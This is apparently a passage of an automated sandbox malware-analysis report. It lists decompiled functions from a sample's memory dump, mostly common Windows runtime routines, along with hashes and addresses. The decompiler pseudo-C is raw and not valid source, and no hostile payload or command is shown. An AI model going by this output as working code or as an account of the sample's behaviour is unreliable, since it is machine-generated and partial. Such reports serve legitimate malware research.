                                                              • Instruction Fuzzy Hash: B751DE31605741EBC321EF68C942B67BBE8FF54710F14492AF49587692EB70E848C792
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AF0EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 80%
                                                              			E00AF0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E00AEFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E00AF1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E00A69730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E00AEA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E00AEA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0xb18b04 >> 0x14) + (_v44 -  *0xb18b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E00A47D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E00AE138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E00A47D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E00ADFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0xb18724 & 0x00000008) != 0) {
						E00AE52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E00AF15B5(0xb18ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                              0x00af0eb7
                                                              0x00af0eb9
                                                              0x00af0ec0
                                                              0x00af0ec2
                                                              0x00af0ecd
                                                              0x00af105b
                                                              0x00af105b
                                                              0x00af1061
                                                              0x00af1066
                                                              0x00af1066
                                                              0x00af106b
                                                              0x00af1073
                                                              0x00af1073
                                                              0x00af0ed3
                                                              0x00af0ed6
                                                              0x00af0edc
                                                              0x00af0ee0
                                                              0x00af0ee7
                                                              0x00af0ef0
                                                              0x00af0ef5
                                                              0x00af0efa
                                                              0x00af0efc
                                                              0x00af0efd
                                                              0x00af0f03
                                                              0x00af0f04
                                                              0x00af0f06
                                                              0x00af0f07
                                                              0x00af0f09
                                                              0x00af0f0e
                                                              0x00af0f14
                                                              0x00af0f23
                                                              0x00af0f2d
                                                              0x00af0f34
                                                              0x00af0f34
                                                              0x00af0f14
                                                              0x00af0f52
                                                              0x00000000
                                                              0x00000000
                                                              0x00af0f58
                                                              0x00af0f73
                                                              0x00af0f74
                                                              0x00af0f79
                                                              0x00af0f7d
                                                              0x00af0f80
                                                              0x00af0f86
                                                              0x00af0fab
                                                              0x00af0fb5
                                                              0x00af0fc6
                                                              0x00af0fd1
                                                              0x00af0fe3
                                                              0x00af0fd3
                                                              0x00af0fdc
                                                              0x00af0fdc
                                                              0x00af0feb
                                                              0x00af1009
                                                              0x00af1009
                                                              0x00af1015
                                                              0x00af1027
                                                              0x00af1017
                                                              0x00af1020
                                                              0x00af1020
                                                              0x00af102f
                                                              0x00af103c
                                                              0x00af103c
                                                              0x00af1048
                                                              0x00af1050
                                                              0x00af1050
                                                              0x00af1055
                                                              0x00000000
                                                              0x00af1055
                                                              0x00af0f88
                                                              0x00af0f9e
                                                              0x00af0fa2
                                                              0x00af0fa9
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00af0fa9
                                                              0x00000000

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `
                                                              • API String ID: 0-2679148245
                                                              • Opcode ID: df67f164e50dc53faa0372153718947d6158969c9dc517335b20e15e0c6755e0
                                                              • Instruction ID: b4e2b3c24484f9588f437d81896561f2b6e657f7a1f1d1b5f4207cb02e6f8594
                                                              • Opcode Fuzzy Hash: df67f164e50dc53faa0372153718947d6158969c9dc517335b20e15e0c6755e0
                                                              • Instruction Fuzzy Hash: 4E51AB712083869FD324DF69D981F2BB7E5EBC4304F04092CFA8697292DB70E845CB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A5F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 75%
                                                              			E00A5F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E00A44120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E00A69830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E00A69990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E00A695D0();
							goto L11;
						} else {
							_t109 = L00A44620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E00A6F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E00A695D0();
										L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                              0x00a5f0d3
                                                              0x00a5f0d9
                                                              0x00a5f0e0
                                                              0x00a5f0e7
                                                              0x00a5f0f2
                                                              0x00a5f0f4
                                                              0x00a5f0f8
                                                              0x00a5f100
                                                              0x00a5f108
                                                              0x00a5f10d
                                                              0x00a5f115
                                                              0x00a5f116
                                                              0x00a5f11f
                                                              0x00a5f123
                                                              0x00a5f124
                                                              0x00a5f12c
                                                              0x00a5f130
                                                              0x00a5f134
                                                              0x00a5f13d
                                                              0x00a5f144
                                                              0x00a5f14b
                                                              0x00a5f152
                                                              0x00a9bab0
                                                              0x00a9bab0
                                                              0x00a5f158
                                                              0x00a5f158
                                                              0x00a5f15a
                                                              0x00a5f160
                                                              0x00a5f165
                                                              0x00a5f166
                                                              0x00a5f16f
                                                              0x00a5f173
                                                              0x00a9baa7
                                                              0x00a9baa7
                                                              0x00a9baab
                                                              0x00000000
                                                              0x00a5f179
                                                              0x00a5f18d
                                                              0x00a5f191
                                                              0x00a9baa2
                                                              0x00000000
                                                              0x00a5f197
                                                              0x00a5f19b
                                                              0x00a5f1a2
                                                              0x00a5f1a9
                                                              0x00a5f1af
                                                              0x00a5f1b2
                                                              0x00a5f1b6
                                                              0x00a5f1b9
                                                              0x00a5f1c4
                                                              0x00a5f1d8
                                                              0x00a5f1df
                                                              0x00a5f1e3
                                                              0x00a5f1eb
                                                              0x00a5f1ee
                                                              0x00a5f1f4
                                                              0x00a5f20f
                                                              0x00a9bab7
                                                              0x00a9babb
                                                              0x00a9bacc
                                                              0x00a9bad1
                                                              0x00a5f215
                                                              0x00a5f218
                                                              0x00a5f226
                                                              0x00a5f22b
                                                              0x00000000
                                                              0x00a5f22b
                                                              0x00a5f1f6
                                                              0x00a5f1f6
                                                              0x00a5f1f9
                                                              0x00a5f1fb
                                                              0x00a5f1fb
                                                              0x00a5f1f4
                                                              0x00a5f191
                                                              0x00a5f173
                                                              0x00a5f152
                                                              0x00a5f203

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                              • Instruction ID: c063a10dbf28da4314b49aa79f89ad9415d3871278524f7e0ad345f8fcae54a2
                                                              • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                              • Instruction Fuzzy Hash: 6751A0716047109FC321DF19C941A6BB7F8FF88750F108A2EFA9597691E7B4E904CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AA3540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 75%
                                                              			E00AA3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0xb1d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E00A60BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E00AA3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E00A6FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E00AA3540;
						E00A6FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E00A7DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E00AB0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E00A697C0();
					}
					return E00A6B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E00AA3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E00AA3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E00A6FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E00A69650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E00AA3787(_a4,  &_v352, _t80);
						}
					}
					L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E00A695D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                              0x00aa3552
                                                              0x00aa355a
                                                              0x00aa355d
                                                              0x00aa3566
                                                              0x00aa3567
                                                              0x00aa357e
                                                              0x00aa358f
                                                              0x00aa35a1
                                                              0x00aa35a5
                                                              0x00aa366b
                                                              0x00aa366b
                                                              0x00aa366d
                                                              0x00aa3672
                                                              0x00aa3679
                                                              0x00aa3685
                                                              0x00aa368d
                                                              0x00aa369d
                                                              0x00aa36a7
                                                              0x00aa36b8
                                                              0x00aa36c6
                                                              0x00aa36c7
                                                              0x00aa36dc
                                                              0x00aa36e1
                                                              0x00aa36e7
                                                              0x00aa36e9
                                                              0x00aa36e9
                                                              0x00aa3703
                                                              0x00aa3703
                                                              0x00aa35b5
                                                              0x00aa35c0
                                                              0x00aa35c4
                                                              0x00000000
                                                              0x00000000
                                                              0x00aa35ca
                                                              0x00aa35d7
                                                              0x00aa35e2
                                                              0x00aa35e6
                                                              0x00aa35e8
                                                              0x00aa35f5
                                                              0x00aa35fa
                                                              0x00aa3603
                                                              0x00aa3604
                                                              0x00aa3609
                                                              0x00aa360a
                                                              0x00aa3612
                                                              0x00aa3613
                                                              0x00aa361e
                                                              0x00aa3622
                                                              0x00aa3628
                                                              0x00aa362f
                                                              0x00aa362f
                                                              0x00aa3636
                                                              0x00aa3638
                                                              0x00aa363b
                                                              0x00aa3642
                                                              0x00aa3642
                                                              0x00aa3636
                                                              0x00aa3657
                                                              0x00aa3657
                                                              0x00aa365c
                                                              0x00aa3662
                                                              0x00aa3669
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryHash
                                                              • API String ID: 0-2202222882
                                                              • Opcode ID: 6b95ee07a4a116472e3ac09ea18aabbfb04ee5b18da89aad4504a1f7c4f3dd7b
                                                              • Instruction ID: bcaeac96668375d4dc6a849fe7fd63b14fdec67c25f3ad7c78e89ac6e716bc4b
                                                              • Opcode Fuzzy Hash: 6b95ee07a4a116472e3ac09ea18aabbfb04ee5b18da89aad4504a1f7c4f3dd7b
                                                              • Instruction Fuzzy Hash: BF4130B2D0052CABDF21DA54CD81FEFB77CAB45714F0045A5BA09AB281DB709F888F94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AF05AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 71%
                                                              			E00AF05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E00AF07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E00A69730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E00AEA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E00AEA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E00AF1293(_t79, _v40, E00AF07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E00A47D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E00AE138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                              0x00af05c5
                                                              0x00af05ca
                                                              0x00af05d3
                                                              0x00af06db
                                                              0x00af06db
                                                              0x00af06dd
                                                              0x00af06e3
                                                              0x00af06e3
                                                              0x00af05dd
                                                              0x00af05e7
                                                              0x00af05f6
                                                              0x00af0600
                                                              0x00af0607
                                                              0x00af0610
                                                              0x00af0615
                                                              0x00af061a
                                                              0x00af061c
                                                              0x00af061e
                                                              0x00af0624
                                                              0x00af0625
                                                              0x00af0627
                                                              0x00af0628
                                                              0x00af0631
                                                              0x00af0640
                                                              0x00af064d
                                                              0x00af0654
                                                              0x00af0654
                                                              0x00af0631
                                                              0x00af066d
                                                              0x00af0674
                                                              0x00000000
                                                              0x00000000
                                                              0x00af0692
                                                              0x00af069e
                                                              0x00af06b0
                                                              0x00af06a0
                                                              0x00af06a9
                                                              0x00af06a9
                                                              0x00af06b8
                                                              0x00af06d6
                                                              0x00af06d6
                                                              0x00000000

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `
                                                              • API String ID: 0-2679148245
                                                              • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                              • Instruction ID: b58d97ec698a135b041f9dacca97ded96efd659e9d4157acc36a9b84245922c2
                                                              • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                              • Instruction Fuzzy Hash: 8B310032300349ABE720DF65CD85FAB7799AB84754F044228FA48DB282E6B0ED14CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AA3884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 72%
                                                              			E00AA3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E00A69650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L00A44620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E00A69650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                              0x00aa3893
                                                              0x00aa3896
                                                              0x00aa3899
                                                              0x00aa389f
                                                              0x00aa38a0
                                                              0x00aa38a4
                                                              0x00aa38a9
                                                              0x00aa38ac
                                                              0x00aa38ad
                                                              0x00aa38ae
                                                              0x00aa38af
                                                              0x00aa38b1
                                                              0x00aa38b4
                                                              0x00aa38bb
                                                              0x00aa38bc
                                                              0x00aa38bd
                                                              0x00aa38c4
                                                              0x00aa38c8
                                                              0x00aa38ca
                                                              0x00aa38ca
                                                              0x00aa38d5
                                                              0x00aa393e
                                                              0x00aa3940
                                                              0x00aa3942
                                                              0x00aa3952
                                                              0x00aa3954
                                                              0x00aa3961
                                                              0x00aa3961
                                                              0x00aa3967
                                                              0x00aa396e
                                                              0x00aa396e
                                                              0x00aa3947
                                                              0x00aa394c
                                                              0x00000000
                                                              0x00aa394c
                                                              0x00aa38ea
                                                              0x00aa38ee
                                                              0x00aa38f8
                                                              0x00aa38f9
                                                              0x00aa38ff
                                                              0x00aa3900
                                                              0x00aa3902
                                                              0x00aa3903
                                                              0x00aa390b
                                                              0x00aa390f
                                                              0x00aa3950
                                                              0x00000000
                                                              0x00aa3950
                                                              0x00aa3915
                                                              0x00aa391d
                                                              0x00aa391d
                                                              0x00aa3922
                                                              0x00aa3926
                                                              0x00000000
                                                              0x00aa3928
                                                              0x00aa392b
                                                              0x00aa392b
                                                              0x00aa3935
                                                              0x00aa3937
                                                              0x00aa3937
                                                              0x00000000
                                                              0x00aa3935
                                                              0x00aa3926
                                                              0x00aa38f0
                                                              0x00000000

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryName
                                                              • API String ID: 0-215506332
                                                              • Opcode ID: b3e40f6c8f7828c65310b88d1088552dc469efded432290348ee320bd07d68b9
                                                              • Instruction ID: d0e4c004c7c2f4783dd6275fc64e1bf5cc6aff18c7773ba585a33eb8823469ce
                                                              • Opcode Fuzzy Hash: b3e40f6c8f7828c65310b88d1088552dc469efded432290348ee320bd07d68b9
                                                              • Instruction Fuzzy Hash: E8312F3790161AAFEF15DB59C951E6FF778EB82B20F014129F914A7280D770AF00C7A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A5D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 33%
                                                              			E00A5D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0xb1d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E00A44120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E00A6B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E00A698D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E00A695D0();
					L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                              0x00a5d29c
                                                              0x00a5d2a6
                                                              0x00a5d2b1
                                                              0x00a5d2b5
                                                              0x00a5d2b6
                                                              0x00a5d2bc
                                                              0x00a5d2bd
                                                              0x00a5d2be
                                                              0x00a5d2bf
                                                              0x00a5d2c2
                                                              0x00a5d2c4
                                                              0x00a5d2cc
                                                              0x00a5d384
                                                              0x00a5d34b
                                                              0x00a5d34f
                                                              0x00a5d350
                                                              0x00a5d351
                                                              0x00a5d35c
                                                              0x00a5d35c
                                                              0x00a5d2d6
                                                              0x00a5d2da
                                                              0x00a5d2e1
                                                              0x00a5d361
                                                              0x00a5d369
                                                              0x00a5d36d
                                                              0x00a5d2e3
                                                              0x00a5d2e3
                                                              0x00a5d2e3
                                                              0x00a5d2e5
                                                              0x00a5d2ed
                                                              0x00a5d2f5
                                                              0x00a5d2fa
                                                              0x00a5d302
                                                              0x00a5d303
                                                              0x00a5d30b
                                                              0x00a5d30f
                                                              0x00a5d313
                                                              0x00a5d318
                                                              0x00a5d31c
                                                              0x00a5d320
                                                              0x00a5d379
                                                              0x00a5d37d
                                                              0x00000000
                                                              0x00000000
                                                              0x00a9affe
                                                              0x00a9b001
                                                              0x00a9b011
                                                              0x00000000
                                                              0x00a5d322
                                                              0x00a5d322
                                                              0x00a5d330
                                                              0x00a5d337
                                                              0x00a5d35d
                                                              0x00a5d339
                                                              0x00a5d33f
                                                              0x00a5d38c
                                                              0x00a5d38c
                                                              0x00a5d33f
                                                              0x00a5d349
                                                              0x00000000
                                                              0x00a5d349

                                                              Strings
                                                              Memory Dump Source
